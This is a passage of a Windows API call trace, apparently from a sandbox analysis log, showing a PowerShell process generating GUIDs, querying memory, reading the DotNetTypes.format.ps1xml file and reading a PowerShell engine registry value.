	[0054.564] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x3557f63c, Data2=0x5baa, Data3=0x4465, Data4=([0]=0x98, [1]=0x2e, [2]=0x1e, [3]=0x9d, [4]=0x8b, [5]=0x60, [6]=0x9a, [7]=0x92))) returned 0x0
	[0054.564] VirtualQuery (in: lpAddress=0x22d114, lpBuffer=0x22e114, dwLength=0x1c | out: lpBuffer=0x22e114*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.564] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.564] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.565] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x55a4b2f8, Data2=0xa4e0, Data3=0x41c5, Data4=([0]=0x84, [1]=0x64, [2]=0x61, [3]=0xbd, [4]=0x68, [5]=0x3, [6]=0x7f, [7]=0xc8))) returned 0x0
	[0054.565] VirtualQuery (in: lpAddress=0x22d114, lpBuffer=0x22e114, dwLength=0x1c | out: lpBuffer=0x22e114*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.565] VirtualQuery (in: lpAddress=0x22d02c, lpBuffer=0x22e02c, dwLength=0x1c | out: lpBuffer=0x22e02c*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.566] VirtualQuery (in: lpAddress=0x22cce0, lpBuffer=0x22dce0, dwLength=0x1c | out: lpBuffer=0x22dce0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.566] VirtualQuery (in: lpAddress=0x22cce0, lpBuffer=0x22dce0, dwLength=0x1c | out: lpBuffer=0x22dce0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.566] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x2268bc60, Data2=0x53e, Data3=0x49fd, Data4=([0]=0xbe, [1]=0x4e, [2]=0xe6, [3]=0x9d, [4]=0x36, [5]=0xb0, [6]=0x3, [7]=0x2a))) returned 0x0
	[0054.566] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xb460927b, Data2=0xbe, Data3=0x49d3, Data4=([0]=0xa0, [1]=0x32, [2]=0xe, [3]=0x63, [4]=0xb6, [5]=0x59, [6]=0xc6, [7]=0x5e))) returned 0x0
	[0054.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.567] GetLastError () returned 0x57
	[0054.567] SetErrorMode (uMode=0x1) returned 0x1
	[0054.567] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0054.567] GetLastError () returned 0x0
	[0054.567] GetFileType (hFile=0x2fc) returned 0x1
	[0054.567] SetErrorMode (uMode=0x1) returned 0x1
	[0054.567] GetFileType (hFile=0x2fc) returned 0x1
	[0054.567] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.568] GetLastError () returned 0x0
	[0054.569] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.569] GetLastError () returned 0x0
	[0054.605] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.606] GetLastError () returned 0x0
	[0054.606] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.606] GetLastError () returned 0x0
	[0054.607] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.607] GetLastError () returned 0x0
	[0054.607] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.607] GetLastError () returned 0x0
	[0054.607] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.607] GetLastError () returned 0x0
	[0054.607] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.607] GetLastError () returned 0x0
	[0054.608] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.608] GetLastError () returned 0x0
	[0054.608] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.608] GetLastError () returned 0x0
	[0054.609] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.609] GetLastError () returned 0x0
	[0054.609] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.609] GetLastError () returned 0x0
	[0054.609] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.609] GetLastError () returned 0x0
	[0054.609] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.609] GetLastError () returned 0x0
	[0054.609] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.609] GetLastError () returned 0x0
	[0054.610] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.610] GetLastError () returned 0x0
	[0054.613] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.614] GetLastError () returned 0x0
	[0054.614] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0xbce, lpOverlapped=0x0) returned 1
	[0054.614] GetLastError () returned 0x0
	[0054.614] ReadFile (in: hFile=0x2fc, lpBuffer=0x2407c86, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2407c86*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.614] GetLastError () returned 0x0
	[0054.614] ReadFile (in: hFile=0x2fc, lpBuffer=0x2408518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2408518*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.614] GetLastError () returned 0x0
	[0054.614] CloseHandle (hObject=0x2fc) returned 1
	[0054.614] GetLastError () returned 0x0
	[0054.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.615] GetLastError () returned 0x0
	[0054.615] SetErrorMode (uMode=0x1) returned 0x1
	[0054.615] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2429514 | out: lpFileInformation=0x2429514*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0054.615] GetLastError () returned 0x0
	[0054.615] SetErrorMode (uMode=0x1) returned 0x1
	[0054.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.615] GetLastError () returned 0x0
	[0054.615] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e218 | out: phkResult=0x22e218*=0x2fc) returned 0x0
	[0054.615] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x0, lpcbData=0x22e25c*=0x0 | out: lpType=0x22e260*=0x1, lpData=0x0, lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.615] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x3c3520, lpcbData=0x22e25c*=0x56 | out: lpType=0x22e260*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.615] RegCloseKey (hKey=0x2fc) returned 0x0
	[0054.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.616] GetLastError () returned 0x0
	[0054.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.616] GetLastError () returned 0x0
	[0054.619] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xb6b43124, Data2=0xdc46, Data3=0x4b67, Data4=([0]=0xac, [1]=0x10, [2]=0xd1, [3]=0x85, [4]=0xde, [5]=0x1e, [6]=0x60, [7]=0x12))) returned 0x0
	[0054.620] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x83c10e11, Data2=0x8f80, Data3=0x44d5, Data4=([0]=0x88, [1]=0x42, [2]=0x68, [3]=0x15, [4]=0x68, [5]=0x9c, [6]=0xfe, [7]=0x8f))) returned 0x0
	[0054.620] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x4b092017, Data2=0x31eb, Data3=0x4586, Data4=([0]=0xb7, [1]=0x14, [2]=0x8c, [3]=0xc3, [4]=0x63, [5]=0xd, [6]=0x12, [7]=0x11))) returned 0x0
	[0054.620] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x9ebcd58e, Data2=0xfcd2, Data3=0x4c99, Data4=([0]=0xb0, [1]=0xab, [2]=0x9c, [3]=0xed, [4]=0x22, [5]=0x81, [6]=0x38, [7]=0x43))) returned 0x0
	[0054.620] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xeca2fd51, Data2=0x5984, Data3=0x4c81, Data4=([0]=0x9e, [1]=0x88, [2]=0xbc, [3]=0xc2, [4]=0x4a, [5]=0x2b, [6]=0xcb, [7]=0xbe))) returned 0x0
	[0054.620] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x2344d02f, Data2=0x7d71, Data3=0x412f, Data4=([0]=0x85, [1]=0x4d, [2]=0x53, [3]=0x37, [4]=0x25, [5]=0x92, [6]=0xce, [7]=0x59))) returned 0x0
	[0054.621] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.621] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xa76bf7fc, Data2=0x550f, Data3=0x49ad, Data4=([0]=0xb7, [1]=0xc3, [2]=0x79, [3]=0xd3, [4]=0x36, [5]=0x4c, [6]=0x64, [7]=0x54))) returned 0x0
	[0054.621] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.621] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.621] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xfaa8e703, Data2=0x8065, Data3=0x4196, Data4=([0]=0xbf, [1]=0xe3, [2]=0x84, [3]=0x20, [4]=0xfa, [5]=0x53, [6]=0x6b, [7]=0x92))) returned 0x0
	[0054.622] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x3a2dfdee, Data2=0x2b92, Data3=0x4af3, Data4=([0]=0x85, [1]=0x5, [2]=0x39, [3]=0x2f, [4]=0xbc, [5]=0x27, [6]=0xd2, [7]=0xd0))) returned 0x0
	[0054.622] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xc012412c, Data2=0x677e, Data3=0x4b0d, Data4=([0]=0xa6, [1]=0x3d, [2]=0x52, [3]=0xb1, [4]=0x2, [5]=0x3, [6]=0xba, [7]=0xcf))) returned 0x0
	[0054.622] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x45599ba5, Data2=0xf38a, Data3=0x4574, Data4=([0]=0xaa, [1]=0x60, [2]=0x85, [3]=0x7f, [4]=0x3e, [5]=0x7a, [6]=0xce, [7]=0xb6))) returned 0x0
	[0054.622] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.622] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xfe28535e, Data2=0x226d, Data3=0x4715, Data4=([0]=0x86, [1]=0x9f, [2]=0xd2, [3]=0xb9, [4]=0x34, [5]=0x95, [6]=0x69, [7]=0x74))) returned 0x0
	[0054.623] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.623] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.623] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.624] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.624] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.625] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xaf06699c, Data2=0x6436, Data3=0x41f0, Data4=([0]=0x9e, [1]=0xab, [2]=0x2e, [3]=0xdb, [4]=0x55, [5]=0x59, [6]=0x2f, [7]=0xc))) returned 0x0
	[0054.625] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x3e6045d9, Data2=0x2b97, Data3=0x4cae, Data4=([0]=0x89, [1]=0xf9, [2]=0x28, [3]=0x29, [4]=0xde, [5]=0x22, [6]=0x51, [7]=0x4d))) returned 0x0
	[0054.625] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x91c3f335, Data2=0x6737, Data3=0x448a, Data4=([0]=0xa8, [1]=0x8a, [2]=0x57, [3]=0x7, [4]=0xbb, [5]=0x2a, [6]=0x71, [7]=0x86))) returned 0x0
	[0054.625] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x9ac0fdb2, Data2=0x7106, Data3=0x4035, Data4=([0]=0x8f, [1]=0x8f, [2]=0x91, [3]=0xd, [4]=0x4e, [5]=0x39, [6]=0x9a, [7]=0x5b))) returned 0x0
	[0054.625] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xca97e290, Data2=0x15fa, Data3=0x48e8, Data4=([0]=0xb2, [1]=0xaa, [2]=0x83, [3]=0xa, [4]=0xf0, [5]=0x56, [6]=0xdf, [7]=0x3c))) returned 0x0
	[0054.625] VirtualQuery (in: lpAddress=0x22d114, lpBuffer=0x22e114, dwLength=0x1c | out: lpBuffer=0x22e114*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.625] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x51c8508a, Data2=0xe84c, Data3=0x4356, Data4=([0]=0xa7, [1]=0xe2, [2]=0xb4, [3]=0xe5, [4]=0x2e, [5]=0xde, [6]=0x3e, [7]=0xb3))) returned 0x0
	[0054.626] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x9c1c1069, Data2=0xebc0, Data3=0x4e4f, Data4=([0]=0x9e, [1]=0xc8, [2]=0x29, [3]=0x8a, [4]=0x6e, [5]=0x81, [6]=0xe2, [7]=0xc1))) returned 0x0
	[0054.626] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x2cb35066, Data2=0x4392, Data3=0x41ce, Data4=([0]=0xb2, [1]=0x21, [2]=0x78, [3]=0x96, [4]=0xf7, [5]=0x19, [6]=0x30, [7]=0xd0))) returned 0x0
	[0054.626] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x80f9de90, Data2=0xb879, Data3=0x4716, Data4=([0]=0xb9, [1]=0xbc, [2]=0x58, [3]=0xd, [4]=0xef, [5]=0xb0, [6]=0x2, [7]=0x36))) returned 0x0
	[0054.626] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xcda05870, Data2=0x438f, Data3=0x44f0, Data4=([0]=0xb4, [1]=0x6a, [2]=0x10, [3]=0x75, [4]=0x70, [5]=0x1d, [6]=0x2a, [7]=0x9d))) returned 0x0
	[0054.626] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xc3e1e33b, Data2=0xcc04, Data3=0x4365, Data4=([0]=0xac, [1]=0xb2, [2]=0xd6, [3]=0x18, [4]=0x37, [5]=0x74, [6]=0xc5, [7]=0x42))) returned 0x0
	[0054.627] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xd3903b09, Data2=0xf512, Data3=0x4c7a, Data4=([0]=0x96, [1]=0xbc, [2]=0xc9, [3]=0xab, [4]=0x82, [5]=0xbd, [6]=0x64, [7]=0x9e))) returned 0x0
	[0054.627] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x7ed49876, Data2=0x535, Data3=0x48c9, Data4=([0]=0xa3, [1]=0xdc, [2]=0x5f, [3]=0xf6, [4]=0x5f, [5]=0x5a, [6]=0x23, [7]=0x5d))) returned 0x0
	[0054.627] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xcaf1d56a, Data2=0x22b2, Data3=0x4e2c, Data4=([0]=0x92, [1]=0x19, [2]=0xda, [3]=0xc3, [4]=0x43, [5]=0x53, [6]=0x79, [7]=0x7f))) returned 0x0
	[0054.627] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x73fb81d1, Data2=0x4220, Data3=0x449f, Data4=([0]=0x97, [1]=0xe2, [2]=0xe6, [3]=0x56, [4]=0x23, [5]=0x27, [6]=0x3e, [7]=0xfb))) returned 0x0
	[0054.627] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x6cc1e173, Data2=0x85d5, Data3=0x4c25, Data4=([0]=0x93, [1]=0x59, [2]=0x50, [3]=0xc9, [4]=0x1b, [5]=0x59, [6]=0xa0, [7]=0x12))) returned 0x0
	[0054.627] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x678077e9, Data2=0xc399, Data3=0x4f9a, Data4=([0]=0xa8, [1]=0xb6, [2]=0xe, [3]=0xac, [4]=0xef, [5]=0x7b, [6]=0xc0, [7]=0x96))) returned 0x0
	[0054.627] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x4fecc840, Data2=0xc261, Data3=0x4620, Data4=([0]=0x82, [1]=0x5a, [2]=0xe, [3]=0xc7, [4]=0x7b, [5]=0x95, [6]=0xaf, [7]=0xe))) returned 0x0
	[0054.628] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x15967924, Data2=0xa058, Data3=0x4b7d, Data4=([0]=0xbc, [1]=0x40, [2]=0x92, [3]=0xe0, [4]=0x6e, [5]=0x8, [6]=0xf9, [7]=0x2a))) returned 0x0
	[0054.628] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xeaf6af3c, Data2=0x39cd, Data3=0x466c, Data4=([0]=0xad, [1]=0x9a, [2]=0xf, [3]=0x67, [4]=0x7d, [5]=0x4b, [6]=0x9a, [7]=0x46))) returned 0x0
	[0054.628] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xf7fb8b47, Data2=0x3d4c, Data3=0x4387, Data4=([0]=0xb2, [1]=0xc, [2]=0xf8, [3]=0xb2, [4]=0xf4, [5]=0x9b, [6]=0xb0, [7]=0x41))) returned 0x0
	[0054.628] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x5e1fd449, Data2=0x73c1, Data3=0x437e, Data4=([0]=0x96, [1]=0x2d, [2]=0xb5, [3]=0xbc, [4]=0x29, [5]=0xf2, [6]=0x4b, [7]=0xd))) returned 0x0
	[0054.628] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x892f1bf4, Data2=0x67f3, Data3=0x42ec, Data4=([0]=0x92, [1]=0xa6, [2]=0x55, [3]=0x2e, [4]=0x7c, [5]=0x5c, [6]=0x76, [7]=0xdf))) returned 0x0
	[0054.629] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xacaab34f, Data2=0x49cc, Data3=0x44d0, Data4=([0]=0x94, [1]=0xa, [2]=0x9c, [3]=0x90, [4]=0x7b, [5]=0xce, [6]=0x7f, [7]=0x38))) returned 0x0
	[0054.629] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.629] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.631] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
